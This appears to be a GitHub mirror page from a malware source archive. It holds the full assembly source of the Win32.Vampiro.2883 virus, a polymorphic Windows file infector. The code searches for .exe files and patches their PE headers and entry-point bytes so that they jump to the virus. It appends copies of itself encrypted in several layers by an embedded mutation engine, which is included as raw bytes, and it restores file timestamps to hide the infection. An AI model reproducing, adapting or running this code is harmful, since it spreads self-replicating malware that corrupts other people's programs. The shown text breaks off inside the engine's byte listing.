mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
952 lines
23 KiB
NASM
952 lines
23 KiB
NASM
|
; Win32.Vampiro.2883
|
||
|
;
|
||
|
; - poly, used LME32 v.1.0
|
||
|
; - many layers, max - 11
|
||
|
; - used SEH
|
||
|
; - dont change entry point
|
||
|
;
|
||
|
; (c) LordDark [MATRiX]
|
||
|
|
||
|
|
||
|
.386
|
||
|
include 1.inc
|
||
|
locals __
|
||
|
.model flat
|
||
|
.code
|
||
|
db ?
|
||
|
.data
|
||
|
|
||
|
start proc
|
||
|
call get_delta
|
||
|
call set_seh
|
||
|
mov esp, [esp.8]
|
||
|
jmp exit
|
||
|
set_seh:
|
||
|
sti
|
||
|
sub eax, eax
|
||
|
push 4 ptr fs:[eax]
|
||
|
mov 4 ptr fs:[eax], esp
|
||
|
mov eax, [esp+11*4]
|
||
|
sub ax, ax
|
||
|
__5:
|
||
|
cmp 2 ptr [eax], 'ZM'
|
||
|
jz __4
|
||
|
sub eax, 10000h
|
||
|
jmp __5
|
||
|
__4:
|
||
|
mov 4 ptr [ebp.k32], eax
|
||
|
call import
|
||
|
push 0
|
||
|
call [ebp.GetModuleHandleA]
|
||
|
add [ebp.host32_1], eax
|
||
|
call restore
|
||
|
sub esp, 16
|
||
|
push esp
|
||
|
call [ebp.GetSystemTime]
|
||
|
mov eax, esp
|
||
|
push eax eax esp eax
|
||
|
call [ebp.SystemTimeToFileTime]
|
||
|
mov eax, [esp]
|
||
|
xor eax, [esp.4]
|
||
|
add esp, 24
|
||
|
mov [ebp.seed], eax
|
||
|
lea eax, [ebp.rnd]
|
||
|
mov 4 ptr [ebp.lme32_random], eax
|
||
|
push _vl 0
|
||
|
call [ebp.GlobalAlloc]
|
||
|
push eax
|
||
|
xchg eax, edi
|
||
|
lea esi, [ebp.start]
|
||
|
mov ecx, vl
|
||
|
lea eax, [ebp+__exit]
|
||
|
push eax
|
||
|
lea eax, [edi+__next-start]
|
||
|
push eax
|
||
|
rep movsb
|
||
|
ret
|
||
|
__next:
|
||
|
call get_delta
|
||
|
sub esp, size find_str
|
||
|
mov esi, esp
|
||
|
sub edi, edi
|
||
|
push esi ;;; hehe
|
||
|
lea eax, [ebp+mask]
|
||
|
push eax
|
||
|
call [ebp+FindFirstFileA]
|
||
|
cmp eax, -1
|
||
|
jz __1
|
||
|
__2:
|
||
|
push eax
|
||
|
push edi
|
||
|
push esi
|
||
|
lea edx, [esi.cFileName]
|
||
|
call infect_it
|
||
|
pop esi
|
||
|
push esi
|
||
|
push 4 ptr [esp.8]
|
||
|
call [ebp+FindNextFileA]
|
||
|
pop edi
|
||
|
inc edi
|
||
|
cmp edi, 50
|
||
|
ja __3
|
||
|
test eax, eax
|
||
|
pop eax
|
||
|
jnz __2
|
||
|
push eax
|
||
|
__3:
|
||
|
call [ebp+FindClose]
|
||
|
__1:
|
||
|
add esp, size find_str
|
||
|
ret
|
||
|
__exit:
|
||
|
call [ebp.GlobalFree]
|
||
|
exit:
|
||
|
pop 4 ptr fs:[0]
|
||
|
pop eax
|
||
|
popad
|
||
|
popf
|
||
|
db 68h
|
||
|
host32_1 dd offset host32-400000h
|
||
|
ret
|
||
|
endp
|
||
|
|
||
|
mask db '*.exe',0
|
||
|
|
||
|
restore proc
|
||
|
push 0 5
|
||
|
call __1
|
||
|
saved:
|
||
|
dd 90909090h
|
||
|
db 90h
|
||
|
__1:
|
||
|
mov eax, [ebp.host32_1]
|
||
|
push eax
|
||
|
call [ebp.GetCurrentProcess]
|
||
|
push eax
|
||
|
call [ebp.WriteProcessMemory]
|
||
|
ret
|
||
|
endp
|
||
|
|
||
|
Vampiro db 'Vampiro',0
|
||
|
|
||
|
import_table:
|
||
|
import_beg kernel32
|
||
|
import_nam _lopen
|
||
|
import_nam ReadFile
|
||
|
import_nam WriteFile
|
||
|
import_nam CloseHandle
|
||
|
import_nam SetFileAttributesA
|
||
|
import_nam GetFileAttributesA
|
||
|
import_nam GetFileTime
|
||
|
import_nam SetFileTime
|
||
|
import_nam SetEndOfFile
|
||
|
import_nam GetFileSize
|
||
|
import_nam SetFilePointer
|
||
|
import_nam SystemTimeToFileTime
|
||
|
import_nam GetSystemTime
|
||
|
import_nam WriteProcessMemory
|
||
|
import_nam GetCurrentProcess
|
||
|
import_nam GlobalAlloc
|
||
|
import_nam GlobalFree
|
||
|
import_nam FindClose
|
||
|
import_nam FindFirstFileA
|
||
|
import_nam FindNextFileA
|
||
|
import_end
|
||
|
import_end
|
||
|
|
||
|
get_delta proc
|
||
|
call $+5
|
||
|
delta:
|
||
|
cld
|
||
|
pop ebp
|
||
|
sub ebp, offset delta
|
||
|
ret
|
||
|
endp
|
||
|
|
||
|
include import.inc
|
||
|
|
||
|
infect_it proc
|
||
|
call __set_seh
|
||
|
mov esp, [esp.8]
|
||
|
jmp __1
|
||
|
__set_seh:
|
||
|
cld
|
||
|
sub eax, eax
|
||
|
push 4 ptr fs:[eax]
|
||
|
mov 4 ptr fs:[eax], esp
|
||
|
call infect
|
||
|
__1:
|
||
|
pop 4 ptr fs:[0]
|
||
|
pop eax
|
||
|
ret
|
||
|
endp
|
||
|
|
||
|
infect proc
|
||
|
; edx - name
|
||
|
call fattrg
|
||
|
cmp eax, -1
|
||
|
jnz __1
|
||
|
__2:
|
||
|
ret
|
||
|
__1: sub ecx, ecx
|
||
|
xchg eax, ecx
|
||
|
call fattrs
|
||
|
test eax, eax
|
||
|
jz __2
|
||
|
push 2
|
||
|
pop eax
|
||
|
call open
|
||
|
cmp eax, -1
|
||
|
xchg eax, ebx
|
||
|
jz __2
|
||
|
push ecx
|
||
|
sub esp, 3*8
|
||
|
mov esi, esp
|
||
|
push edx
|
||
|
call gettime
|
||
|
lea edx, [ebp.buffer]
|
||
|
push 3Ch+4
|
||
|
pop ecx
|
||
|
call read
|
||
|
jc __close
|
||
|
cmp 2 ptr [edx], 'ZM'
|
||
|
jnz __close
|
||
|
cmp 2 ptr [edx.18h], 40h
|
||
|
jb __close
|
||
|
push edx
|
||
|
movzx edx, 2 ptr [edx.3Ch]
|
||
|
mov [ebp.word3C], edx
|
||
|
call seek
|
||
|
pop edx
|
||
|
mov ecx, 0F8h + (28h*8)
|
||
|
call read
|
||
|
jc __close
|
||
|
cmp 2 ptr [edx], 'EP'
|
||
|
jnz __close
|
||
|
; dll ? if i process dll then skip
|
||
|
; this test
|
||
|
test 2 ptr [edx.16h], 2000h
|
||
|
jnz __close
|
||
|
; can run ?
|
||
|
test 2 ptr [edx.16h], 0002h
|
||
|
jz __close
|
||
|
; intel x86 processor ?
|
||
|
mov al, [edx.4]
|
||
|
and al, 11110000b
|
||
|
cmp al, 40h
|
||
|
jnz __close
|
||
|
; 2..8 sections ?
|
||
|
cmp 2 ptr [edx.06h], 8
|
||
|
ja __close
|
||
|
cmp 2 ptr [edx.06h], 2
|
||
|
jb __close
|
||
|
; it's already ?
|
||
|
mov al, 2Eh
|
||
|
cmp 1 ptr [edx.44h], al
|
||
|
jz __close
|
||
|
mov 1 ptr [edx.44h], al
|
||
|
; save EIP
|
||
|
mov eax, [edx.28h]
|
||
|
mov [ebp.host32_1], eax
|
||
|
mov eax, 1000h
|
||
|
cmp [edx.38h], eax
|
||
|
ja __close
|
||
|
cmp [edx.3Ch], eax
|
||
|
ja __close
|
||
|
lea edi, [ebp.buff]
|
||
|
mov ecx, (len_buff)/4
|
||
|
sub eax, eax
|
||
|
call rnd
|
||
|
__loop:
|
||
|
sub al, cl
|
||
|
rol eax, 1
|
||
|
stosd
|
||
|
loop __loop
|
||
|
; ecx - null
|
||
|
mov 4 ptr [edx.58h], ecx
|
||
|
call process_it
|
||
|
__close:
|
||
|
pop edx
|
||
|
mov esi, esp
|
||
|
call settime
|
||
|
add esp, 3*8
|
||
|
call close
|
||
|
pop eax
|
||
|
call fattrs
|
||
|
ret
|
||
|
endp
|
||
|
|
||
|
process_it proc
|
||
|
movzx eax, 2 ptr [edx.14h]
|
||
|
cmp al, 0E0h
|
||
|
jnz __1
|
||
|
lea edi, [eax+18h+edx]
|
||
|
movzx ecx, 2 ptr [edx.6]
|
||
|
__loop:
|
||
|
; check file
|
||
|
mov esi, [edx.28h]
|
||
|
cmp 4 ptr [edi.0Ch], esi
|
||
|
ja __4
|
||
|
push eax
|
||
|
mov eax, 4 ptr [edi.0Ch]
|
||
|
add eax, 4 ptr [edi.10h]
|
||
|
cmp esi, eax
|
||
|
pop eax
|
||
|
jb __5
|
||
|
__4:
|
||
|
add edi, 28h
|
||
|
loop __loop
|
||
|
jmp __1
|
||
|
__5: test 1 ptr [edi.27h], 80h
|
||
|
jnz __1
|
||
|
; read from IP some bytes
|
||
|
; for UEP
|
||
|
lea esi, [eax+18h+edx]
|
||
|
push edx
|
||
|
mov eax, [edx.028h]
|
||
|
sub eax, [edi.0Ch]
|
||
|
add eax, [edi.14h]
|
||
|
mov 4 ptr [ebp.forUEP], eax
|
||
|
xchg eax, edx
|
||
|
call seek
|
||
|
lea edx, [ebp.UEP]
|
||
|
mov ecx, size_UEP
|
||
|
call read
|
||
|
pop edx
|
||
|
jc __1
|
||
|
movzx eax, 2 ptr [edx.6]
|
||
|
dec eax
|
||
|
imul eax, eax, 28h
|
||
|
add esi, eax
|
||
|
mov edi, [esi.14h]
|
||
|
add edi, [esi.10h]
|
||
|
call fsize
|
||
|
cmp eax, edi
|
||
|
jz __2
|
||
|
push edx
|
||
|
mov edx, edi
|
||
|
call seek
|
||
|
push eax
|
||
|
mov edx, esp
|
||
|
push 4
|
||
|
pop ecx
|
||
|
call read
|
||
|
pop eax
|
||
|
cmp eax, 1
|
||
|
jz __3
|
||
|
call fsize
|
||
|
sub eax, edi
|
||
|
cmp eax, 100h ; 256 bytes only
|
||
|
; if yes then skip it ;)
|
||
|
jb __3
|
||
|
pop eax
|
||
|
jmp __1
|
||
|
__3:
|
||
|
mov edx, edi
|
||
|
call seek
|
||
|
call truncate
|
||
|
pop edx
|
||
|
__2: mov [ebp.flen], edi
|
||
|
or 1 ptr [esi.24h+3], 0C0h
|
||
|
|
||
|
lea edi, [ebp.UEP]
|
||
|
mov eax, [edi]
|
||
|
mov 4 ptr [ebp.saved], eax
|
||
|
mov al, [edi.4]
|
||
|
mov 1 ptr [ebp.saved+4], al
|
||
|
mov al, 0E9h
|
||
|
stosb
|
||
|
mov eax, 4 ptr [esi.10h]
|
||
|
add eax, 4 ptr [esi.0Ch]
|
||
|
sub eax, 4 ptr [ebp.host32_1]
|
||
|
sub eax, 5
|
||
|
stosd
|
||
|
; max 11 layers!
|
||
|
push esi
|
||
|
; gen 1 layer
|
||
|
lea esi, [ebp.start]
|
||
|
lea edi, [ebp.buff]
|
||
|
mov ecx, vl
|
||
|
call lme32
|
||
|
; max 10 layer
|
||
|
; 2..10
|
||
|
push eax
|
||
|
push 5
|
||
|
pop eax
|
||
|
call rnd
|
||
|
inc eax
|
||
|
shl eax, 1
|
||
|
xchg eax, ecx
|
||
|
; gen next layers
|
||
|
pop eax
|
||
|
__8:
|
||
|
push ecx
|
||
|
; 1 layer <-|
|
||
|
; 2 layer ---|
|
||
|
mov esi, edi
|
||
|
add edi, eax
|
||
|
xchg eax, ecx
|
||
|
call lme32
|
||
|
xchg esi, edi
|
||
|
xchg eax, ecx
|
||
|
call lme32
|
||
|
; edi - 1 layer
|
||
|
; esi - 2 layer
|
||
|
; eax - length
|
||
|
pop ecx
|
||
|
loop __8
|
||
|
pop esi
|
||
|
dec edi
|
||
|
dec edi
|
||
|
mov 2 ptr [edi], 609Ch
|
||
|
add eax, 8
|
||
|
xchg eax, edi
|
||
|
push eax
|
||
|
; edi - virus length
|
||
|
mov eax, edi
|
||
|
add eax, [edx.3Ch]
|
||
|
add eax, [esi.10h]
|
||
|
mov ecx, [edx.3Ch]
|
||
|
neg ecx
|
||
|
and eax, ecx
|
||
|
mov [esi.10h], eax
|
||
|
cmp [esi.08h], eax
|
||
|
ja __x
|
||
|
mov [esi.08h], eax
|
||
|
__x: mov eax, [esi.08h]
|
||
|
add eax, [esi.0Ch]
|
||
|
add eax, [edx.38h]
|
||
|
mov ecx, [edx.38h]
|
||
|
neg ecx
|
||
|
and eax, ecx
|
||
|
mov [edx.50h], eax
|
||
|
call fsize
|
||
|
xchg eax, edx
|
||
|
call seek
|
||
|
pop edx
|
||
|
push -1
|
||
|
pop eax
|
||
|
call rnd
|
||
|
db 0BFh
|
||
|
flen dd 0
|
||
|
mov ecx, [esi.10h]
|
||
|
add ecx, [esi.14h]
|
||
|
sub ecx, edi
|
||
|
mov 1 ptr [ecx+edx-6], al
|
||
|
xor al, 'V'
|
||
|
mov 1 ptr [ecx+edx-6+1], al
|
||
|
mov 4 ptr [ecx+edx-6+2], edi
|
||
|
call write
|
||
|
mov edx, [ebp.forUEP]
|
||
|
call seek
|
||
|
lea edx, [ebp.UEP]
|
||
|
mov ecx, size_UEP
|
||
|
call write
|
||
|
mov edx, [ebp.word3C]
|
||
|
call seek
|
||
|
lea edx, [ebp.buffer]
|
||
|
mov ecx, 0F8h + (28h*8)
|
||
|
call write
|
||
|
__1:
|
||
|
ret
|
||
|
endp
|
||
|
|
||
|
rnd proc
|
||
|
push ebp
|
||
|
push edx ecx eax
|
||
|
call $+5
|
||
|
$delta:
|
||
|
pop ebp
|
||
|
sub ebp, offset $delta
|
||
|
db 0B8h
|
||
|
seed dd ?
|
||
|
imul eax, eax, 8088405h
|
||
|
inc eax
|
||
|
mov [ebp.seed], eax
|
||
|
pop ecx
|
||
|
jecxz __1
|
||
|
xor edx, edx
|
||
|
div ecx
|
||
|
xchg eax, edx
|
||
|
__1:
|
||
|
pop ecx edx
|
||
|
pop ebp
|
||
|
ret
|
||
|
endp
|
||
|
|
||
|
include fio.inc
|
||
|
include lme32.inc
|
||
|
|
||
|
vl equ ($-start)
|
||
|
|
||
|
buff:
|
||
|
db (11*2000)+vl*2 dup (?)
|
||
|
db 1000h dup (?)
|
||
|
len_buff equ $-buff
|
||
|
buffer db 0F8h + (28h*8) dup (?)
|
||
|
word3C dd ?
|
||
|
size_UEP equ 5
|
||
|
UEP db size_UEP dup (?)
|
||
|
forUEP dd ?
|
||
|
|
||
|
_vl equ ($-start)
|
||
|
|
||
|
.code
|
||
|
host32:
|
||
|
db 0E9h
|
||
|
dd 0
|
||
|
push 0
|
||
|
zcall ExitProcess
|
||
|
db 'Win32.Vampiro.'
|
||
|
db vl / 1000 mod 10 + '0'
|
||
|
db vl / 100 mod 10 + '0'
|
||
|
db vl / 10 mod 10 + '0'
|
||
|
db vl / 1 mod 10 + '0'
|
||
|
real_start:
|
||
|
pushf
|
||
|
pusha
|
||
|
jmp start
|
||
|
end real_start
|
||
|
|
||
|
--[1.inc]--------------------------------------------------------------------->8
|
||
|
|
||
|
zcall macro api
|
||
|
extrn api: proc
|
||
|
call api
|
||
|
endm
|
||
|
|
||
|
CRC32_init equ 0EDB88320h
|
||
|
CRC32_num equ 0FFFFFFFFh
|
||
|
|
||
|
CRC32_eax macro string
|
||
|
db 0B8h
|
||
|
CRC32 string
|
||
|
endm
|
||
|
|
||
|
CRC32 macro string
|
||
|
crcReg = CRC32_num
|
||
|
irpc _x,<string>
|
||
|
ctrlByte = '&_x&' xor (crcReg and 0FFh)
|
||
|
crcReg = crcReg shr 8
|
||
|
rept 8
|
||
|
ctrlByte = (ctrlByte shr 1) xor (CRC32_init * (ctrlByte and 1))
|
||
|
endm
|
||
|
crcReg = crcReg xor ctrlByte
|
||
|
endm
|
||
|
dd crcReg
|
||
|
endm
|
||
|
|
||
|
import_beg macro kernel
|
||
|
db '&kernel&',0
|
||
|
endm
|
||
|
import_nam macro name
|
||
|
CRC32 &name&
|
||
|
local b
|
||
|
b=0
|
||
|
irpc a,<name>
|
||
|
IF b EQ 0
|
||
|
db '&a&'
|
||
|
ENDIF
|
||
|
b=b+1
|
||
|
endm
|
||
|
&name& dd 0
|
||
|
endm
|
||
|
import_end macro
|
||
|
dd 0
|
||
|
endm
|
||
|
|
||
|
MAX_PATH = 260
|
||
|
|
||
|
find_str struc
|
||
|
dwFileAttributes dd ?
|
||
|
ftCreationTime dq ?
|
||
|
ftLastAccessTime dq ?
|
||
|
ftLastWriteTime dq ?
|
||
|
nFileSizeHigh dd ?
|
||
|
nFileSizeLow dd ?
|
||
|
dwReserved0 dd ?
|
||
|
dwReserved1 dd ?
|
||
|
cFileName db MAX_PATH dup (?)
|
||
|
cAlternateFileName db 14 dup (?)
|
||
|
ends
|
||
|
|
||
|
unicode macro text
|
||
|
irpc _x,<text>
|
||
|
db '&_x&',0
|
||
|
endm
|
||
|
db 0,0
|
||
|
endm
|
||
|
|
||
|
hook macro name
|
||
|
local b
|
||
|
b=0
|
||
|
irpc a,<name>
|
||
|
IF b EQ 0
|
||
|
db '&a&'
|
||
|
ENDIF
|
||
|
b=b+1
|
||
|
endm
|
||
|
CRC32 &name&
|
||
|
dw offset h&name&-start
|
||
|
dw offset _&name&-start
|
||
|
endm
|
||
|
|
||
|
dtime struc
|
||
|
wYear dw ?
|
||
|
wMonth dw ?
|
||
|
wDayOfWeek dw ?
|
||
|
wDay dw ?
|
||
|
wHour dw ?
|
||
|
wMinute dw ?
|
||
|
wSecond dw ?
|
||
|
wMilliseconds dw ?
|
||
|
ends
|
||
|
|
||
|
--[import.inc]---------------------------------------------------------------->8
|
||
|
|
||
|
get_proc proc
|
||
|
push ebp
|
||
|
; in:
|
||
|
; eax - CRC32
|
||
|
; ebx - DLL offset
|
||
|
; dl - first char
|
||
|
; out:
|
||
|
; eax - API address
|
||
|
; [ecx+ebx] - offset API address in table
|
||
|
; ebx - offset DLL
|
||
|
mov edi, [ebx+3Ch]
|
||
|
mov edi, [edi+78h+ebx]
|
||
|
mov ecx, [edi+18h+ebx]
|
||
|
mov esi, [edi+20h+ebx]
|
||
|
__1:
|
||
|
mov ebp, [esi+ebx]
|
||
|
add ebp, ebx
|
||
|
cmp 1 ptr [ebp], dl
|
||
|
jnz __2
|
||
|
push ebx ecx
|
||
|
; use ebx, ecx
|
||
|
; ebp - offset to name'z
|
||
|
xor ebx, ebx
|
||
|
dec ebx
|
||
|
__5:
|
||
|
xor bl, 1 ptr [ebp]
|
||
|
inc ebp
|
||
|
mov cl, 7
|
||
|
__3:
|
||
|
shr ebx, 1
|
||
|
jnc __4
|
||
|
xor ebx, CRC32_init
|
||
|
__4:
|
||
|
dec cl
|
||
|
jns __3
|
||
|
cmp 1 ptr [ebp], 0
|
||
|
jnz __5
|
||
|
cmp eax, ebx
|
||
|
pop ecx ebx
|
||
|
jz __6
|
||
|
__2:
|
||
|
add esi, 4
|
||
|
loop __1
|
||
|
__6:
|
||
|
sub ecx, [edi+18h+ebx]
|
||
|
neg ecx
|
||
|
add ecx, ecx
|
||
|
add ecx, [edi+24h+ebx]
|
||
|
add ecx, ebx
|
||
|
movzx ecx, 2 ptr [ecx]
|
||
|
shl ecx, 2
|
||
|
add ecx, [edi+1Ch+ebx]
|
||
|
mov eax, [ecx+ebx]
|
||
|
add eax, ebx
|
||
|
pop ebp
|
||
|
ret
|
||
|
endp
|
||
|
|
||
|
import proc
|
||
|
mov ebx, [ebp.k32]
|
||
|
CRC32_eax GetModuleHandleA
|
||
|
mov dl, 'G'
|
||
|
call get_proc
|
||
|
mov [ebp.GetModuleHandleA], eax
|
||
|
CRC32_eax LoadLibraryA
|
||
|
mov dl, 'L'
|
||
|
call get_proc
|
||
|
mov [ebp.LoadLibraryA], eax
|
||
|
lea esi, [ebp.import_table]
|
||
|
__1:
|
||
|
push esi
|
||
|
call [ebp.GetModuleHandleA]
|
||
|
test eax, eax
|
||
|
jnz __2
|
||
|
; if library not load ...
|
||
|
push esi
|
||
|
call [ebp.LoadLibraryA]
|
||
|
__2:
|
||
|
xchg eax, ebx
|
||
|
__3:
|
||
|
lodsb
|
||
|
test al, al
|
||
|
jnz __3
|
||
|
__4:
|
||
|
lodsd
|
||
|
test eax, eax
|
||
|
jz __5
|
||
|
mov dl, [esi]
|
||
|
inc esi
|
||
|
push esi
|
||
|
call get_proc
|
||
|
pop edi
|
||
|
stosd
|
||
|
mov esi, edi
|
||
|
jmp __4
|
||
|
__5:
|
||
|
cmp [esi], eax
|
||
|
jnz __1
|
||
|
ret
|
||
|
endp
|
||
|
|
||
|
GetModuleHandleA dd 0
|
||
|
LoadLibraryA dd 0
|
||
|
k32 dd 0BFF70000h
|
||
|
|
||
|
--[fio.inc]------------------------------------------------------------------->8
|
||
|
|
||
|
truncate proc
|
||
|
pushad
|
||
|
push ebx
|
||
|
call [ebp.SetEndOfFile]
|
||
|
jmp n_chk
|
||
|
endp
|
||
|
|
||
|
|
||
|
fsize proc
|
||
|
pushad
|
||
|
push 0 ebx
|
||
|
call [ebp.GetFileSize]
|
||
|
jmp n_chk
|
||
|
endp
|
||
|
|
||
|
|
||
|
gettime proc
|
||
|
pushad
|
||
|
; esi - addres struc
|
||
|
;
|
||
|
; CONST FILETIME * lpftLastWrite // time the file was last written
|
||
|
; CONST FILETIME * lpftLastAccess, // time the file was last accessed
|
||
|
; CONST FILETIME * lpftCreation, // time the file was created
|
||
|
;
|
||
|
; filetime struc
|
||
|
; dwLowDateTime dd ?
|
||
|
; dwHighDateTime dd ?
|
||
|
; ends
|
||
|
push esi
|
||
|
lodsd
|
||
|
lodsd
|
||
|
push esi
|
||
|
lodsd
|
||
|
lodsd
|
||
|
push esi ebx
|
||
|
call [ebp.GetFileTime]
|
||
|
jmp n_chk
|
||
|
endp
|
||
|
|
||
|
|
||
|
settime proc
|
||
|
pushad
|
||
|
; esi - addres struc
|
||
|
;
|
||
|
; CONST FILETIME * lpftLastWrite // time the file was last written
|
||
|
; CONST FILETIME * lpftLastAccess, // time the file was last accessed
|
||
|
; CONST FILETIME * lpftCreation, // time the file was created
|
||
|
;
|
||
|
; filetime struc
|
||
|
; dwLowDateTime dd ?
|
||
|
; dwHighDateTime dd ?
|
||
|
; ends
|
||
|
push esi
|
||
|
lodsd
|
||
|
lodsd
|
||
|
push esi
|
||
|
lodsd
|
||
|
lodsd
|
||
|
push esi ebx
|
||
|
call [ebp.SetFileTime]
|
||
|
jmp n_chk
|
||
|
endp
|
||
|
|
||
|
fattrs proc
|
||
|
pushad
|
||
|
push eax edx
|
||
|
call [ebp.SetFileAttributesA]
|
||
|
jmp n_chk
|
||
|
endp
|
||
|
|
||
|
fattrg proc
|
||
|
pushad
|
||
|
push edx
|
||
|
call [ebp.GetFileAttributesA]
|
||
|
jmp n_chk
|
||
|
endp
|
||
|
|
||
|
open proc
|
||
|
pushad
|
||
|
; eax - mode
|
||
|
; edx - name
|
||
|
;
|
||
|
; OF_READ Opens the file for reading only.
|
||
|
; OF_READWRITE Opens the file for reading and writing.
|
||
|
; OF_WRITE Opens the file for writing only.
|
||
|
push eax edx
|
||
|
call [ebp._lopen]
|
||
|
n_chk:
|
||
|
mov [esp.1Ch], eax
|
||
|
popad
|
||
|
ret
|
||
|
endp
|
||
|
|
||
|
close proc
|
||
|
pushad
|
||
|
push ebx
|
||
|
call [ebp.CloseHandle]
|
||
|
popad
|
||
|
ret
|
||
|
endp
|
||
|
|
||
|
write proc
|
||
|
pushad
|
||
|
push eax
|
||
|
mov eax, esp
|
||
|
push 0
|
||
|
push eax
|
||
|
push ecx edx ebx
|
||
|
call [ebp.WriteFile]
|
||
|
jmp n_check
|
||
|
endp
|
||
|
|
||
|
read proc
|
||
|
; ecx - length
|
||
|
; ebx - handle
|
||
|
; edx - buffer
|
||
|
pushad
|
||
|
push eax
|
||
|
mov eax, esp
|
||
|
push 0
|
||
|
push eax
|
||
|
push ecx edx ebx
|
||
|
call [ebp.ReadFile]
|
||
|
n_check:
|
||
|
pop eax
|
||
|
mov [esp.1Ch], eax
|
||
|
popad
|
||
|
cmp eax, ecx
|
||
|
jz __1
|
||
|
stc
|
||
|
__1:
|
||
|
ret
|
||
|
endp
|
||
|
|
||
|
seek proc
|
||
|
pushad
|
||
|
push 0 0 edx ebx
|
||
|
call [ebp.SetFilePointer]
|
||
|
jmp n_chk
|
||
|
endp
|
||
|
|
||
|
--[lme32.inc]----------------------------------------------------------------->8
|
||
|
|
||
|
; LME32 v.1.0
|
||
|
;
|
||
|
; ECX - length
|
||
|
; EDI - buffer
|
||
|
; ESI - source
|
||
|
;
|
||
|
; must be in r/w section
|
||
|
|
||
|
lme32:
|
||
|
db 060h,0E8h,00Fh,000h,000h,000h
|
||
|
lme32_random dd 0
|
||
|
db 05Bh,04Ch,04Dh,045h
|
||
|
db 033h,032h,02Eh,031h,031h,037h,033h,05Dh,081h,0EDh,006h,020h,040h,000h
|
||
|
db 0C1h,0E9h,002h,041h,089h,08Dh,0D3h,021h,040h,000h,089h,0BDh,0E5h,021h
|
||
|
db 040h,000h,089h,0B5h,0CEh,021h,040h,000h,0C7h,085h,025h,022h,040h,000h
|
||
|
db 0EFh,000h,000h,000h,08Dh,0B5h,030h,022h,040h,000h,0E8h,00Fh,003h,000h
|
||
|
db 000h,0B0h,003h,0FFh,0D6h,040h,091h,051h,0E8h,070h,002h,000h,000h,059h
|
||
|
db 0E2h,0F7h,0B0h,0E8h,0AAh,02Bh,0C0h,0ABh,08Bh,0C7h,02Bh,085h,0E5h,021h
|
||
|
db 040h,000h,089h,085h,0BCh,021h,040h,000h,0E8h,0E7h,002h,000h,000h,0E8h
|
||
|
db 0ABh,001h,000h,000h,088h,085h,046h,021h,040h,000h,050h,00Fh,0B6h,0C0h
|
||
|
db 00Fh,0B3h,085h,025h,022h,040h,000h,058h,00Ch,058h,0AAh,0E8h,091h,001h
|
||
|
db 000h,000h,050h,00Fh,0B6h,0C0h,00Fh,0B3h,085h,025h,022h,040h,000h,058h
|
||
|
db 088h,085h,077h,021h,040h,000h,08Bh,095h,0D3h,021h,040h,000h,0E8h,053h
|
||
|
db 001h,000h,000h,0E8h,0A6h,002h,000h,000h,0E8h,0B1h,002h,000h,000h,06Ah
|
||
|
db 0FFh,058h,0FFh,095h,006h,020h,040h,000h,089h,085h,0E1h,020h,040h,000h
|
||
|
db 0B0h,081h,0AAh,0E8h,04Ah,001h,000h,000h,0B0h,0E8h,074h,002h,0B0h,0C0h
|
||
|
db 09Ch,00Ah,085h,046h,021h,040h,000h,0AAh,089h,0BDh,082h,021h,040h,000h
|
||
|
db 0B8h,064h,022h,002h,002h,0ABh,09Dh,074h,006h,0F7h,09Dh,0E1h,020h,040h
|
||
|
db 000h,0E8h,062h,002h,000h,000h,0B0h,003h,0FFh,0D6h,003h,0C0h,08Bh,09Ch
|
||
|
db 005h,0F5h,021h,040h,000h,066h,089h,09Dh,0DDh,021h,040h,000h,08Bh,084h
|
||
|
db 005h,0EFh,021h,040h,000h,00Ah,0A5h,046h,021h,040h,000h,066h,0ABh,089h
|
||
|
db 0BDh,0C7h,021h,040h,000h,0ABh,06Ah,0FFh,058h,0FFh,095h,006h,020h,040h
|
||
|
db 000h,089h,085h,0D8h,021h,040h,000h,0ABh,0E8h,023h,002h,000h,000h,0B0h
|
||
|
db 083h,0AAh,0E8h,0DBh,000h,000h,000h,066h,0B8h,0C0h,004h,074h,004h,066h
|
||
|
db 0B8h,0E8h,0FCh,00Ch,003h,066h,0ABh,0E8h,008h,002h,000h,000h,0B0h,048h
|
||
|
db 00Ah,085h,077h,021h,040h,000h,0AAh,0E8h,0FAh,001h,000h,000h,0E8h,005h
|
||
|
db 002h,000h,000h,0B0h,003h,0FFh,0D6h,08Dh,09Dh,0FBh,021h,040h,000h,0D7h
|
||
|
db 0AAh,08Ah,085h,077h,021h,040h,000h,0C0h,0E0h,003h,00Ch,000h,00Ch,0C0h
|
||
|
db 0AAh,066h,0B8h,00Fh,085h,066h,0ABh,0B8h,0E0h,098h,040h,000h,02Bh,0C7h
|
||
|
db 0ABh,050h,00Fh,0B6h,085h,046h,021h,040h,000h,00Fh,0ABh,085h,025h,022h
|
||
|
db 040h,000h,058h,050h,00Fh,0B6h,085h,077h,021h,040h,000h,00Fh,0ABh,085h
|
||
|
db 025h,022h,040h,000h,058h,0E8h,0A8h,001h,000h,000h,0E8h,0B3h,001h,000h
|
||
|
db 000h,08Bh,0C7h,02Bh,085h,0E5h,021h,040h,000h,02Dh,030h,002h,000h,000h
|
||
|
db 003h,085h,0E1h,020h,040h,000h,0BAh,0F8h,098h,040h,000h,089h,002h,0BEh
|
||
|
db 02Bh,082h,040h,000h,0B9h,015h,005h,000h,000h,0BAh,084h,056h,0BAh,05Ah
|
||
|
db 0ADh,003h,0C2h,0ABh,0E2h,0FAh,08Bh,0C7h,02Dh,07Dh,096h,040h,000h,089h
|
||
|
db 044h,024h,01Ch,061h,0C3h,081h,0B0h,081h,080h,081h,0A8h,033h,0C2h,02Bh
|
||
|
db 0C2h,003h,0C2h,085h,023h,00Bh,0E8h,013h,000h,000h,000h,074h,006h,00Ch
|
||
|
db 0B8h,0AAh,092h,0ABh,0C3h,050h,0B0h,068h,0AAh,092h,0ABh,058h,00Ch,058h
|
||
|
db 0AAh,0C3h,050h,0B0h,002h,0FFh,0D6h,085h,0C0h,058h,0C3h,053h,0B0h,008h
|
||
|
db 0FFh,0D6h,0BBh,0EFh,000h,000h,000h,00Fh,0A3h,0C3h,073h,0F2h,05Bh,0C3h
|
||
|
db 00Fh,0B6h,0C0h,0FFh,0A5h,006h,020h,040h,000h,080h,0CCh,0C0h,0C0h,0E0h
|
||
|
db 003h,00Ah,0C4h,0AAh,0C3h,008h,047h,0FFh,0C3h,00Ch,0C0h,0AAh,0B0h,008h
|
||
|
db 0FFh,0D6h,03Ch,006h,074h,0F8h,0C0h,0E0h,003h,008h,047h,0FFh,0C3h,00Ch
|
||
|
